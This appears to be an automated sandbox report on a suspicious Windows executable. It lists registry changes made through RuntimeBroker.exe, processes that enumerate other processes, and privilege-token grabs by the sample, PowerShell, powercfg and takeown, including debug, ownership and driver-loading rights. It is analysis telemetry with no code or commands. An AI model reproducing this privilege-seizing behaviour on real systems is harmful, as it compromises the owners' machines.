38616333613062626435633236616165616435663634323731376238666538316337356339646464353634396136616666386464653761633830000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006473657978756f6400000000000000005cc36eb49b56f545bab4b48e3a50d6c354916f9ace50ef11bfd9da2e3a28ca1b5cc36eb49b56f545bab4b48e3a50d6c354916f9ace50ef11bfd9da2e3a28ca1bd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003300390032003800380037003600340030002d0031003100380037003000350031003000340037002d0032003900300039003700350038003400330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b58935fa000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = f062923b77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\01645f476675b13f39be10f3ee02455857fa8529cc7dd64406614cb991d65812" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 = a8953d3977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000097a7343977eeda0197a7343977eeda0197a7343977eeda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000e5914932000393530326333386330316432613661313466633033383932366130303230643039643161316461303335353264626539303234303466643838616663613664370000b20009000400efbe0e5914930e5914932e0000000000000000000000000000000000000000000000000069fca500390035003000320063003300380063003000310064003200610036006100310034006600630030003300380039003200360061003000300032003000640030003900640031006100310064006100300033003500350032006400620065003900300032003400300034006600640038003800610066006300610036006400370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000426ebb4e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39353032633338633031643261366131346663303338393236613030323064303964316131646130333535326462653930323430346664383861666361366437000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006473657978756f6400000000000000005cc36eb49b56f545bab4b48e3a50d6c34b916f9ace50ef11bfd9da2e3a28ca1b5cc36eb49b56f545bab4b48e3a50d6c34b916f9ace50ef11bfd9da2e3a28ca1bd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003300390032003800380037003600340030002d0031003100380037003000350031003000340037002d0032003900300039003700350038003400330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b58935fa000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9c8d44b2c17e077f30393d18f61ee0d6e5a1abd7614cc5d97693f62a07748be9" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\01645f476675b13f39be10f3ee02455857fa8529cc7dd64406614cb991d65812" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = ee70813c77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a07fe9ed-6821-4ab3 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 = 4502433977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\136bdf30-4153-4fb9 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c6e97c8ac3a0bbd5c26aaead5f642717b8fe81c75c9ddd5649a6aff8dde7ac80" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c589e687ebfb4c4b2ef06477eba041458444ffbf17c18fd792e7f8052dbf911b" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\36298bd8-9e07-4f2a C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\008b28ae-f18b-4a8d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 = f0244f3977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = 4c89393977eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9502c38c01d2a6a14fc038926a0020d09d1a1da03552dbe902404fd88afca6d7" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\136bdf30-4153-4fb9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006eb7853977eeda012f03783b77eeda012f03783b77eeda015ac808000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000e5914932000303136343566343736363735623133663339626531306633656530323435353835376661383532396363376464363434303636313463623939316436353831320000b20009000400efbe0e5914930e5914932e000000000000000000000000000000000000000000000000009d22cc00300031003600340035006600340037003600360037003500620031003300660033003900620065003100300066003300650065003000320034003500350038003500370066006100380035003200390063006300370064006400360034003400300036003600310034006300620039003900310064003600350038003100320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000426ebb4e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30313634356634373636373562313366333962653130663365653032343535383537666138353239636337646436343430363631346362393931643635383132000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006473657978756f6400000000000000005cc36eb49b56f545bab4b48e3a50d6c353916f9ace50ef11bfd9da2e3a28ca1b5cc36eb49b56f545bab4b48e3a50d6c353916f9ace50ef11bfd9da2e3a28ca1bd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003300390032003800380037003600340030002d0031003100380037003000350031003000340037002d0032003900300039003700350038003400330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b58935fa000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7468b921-5880-43e0 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = 1166813a77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = "0" C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
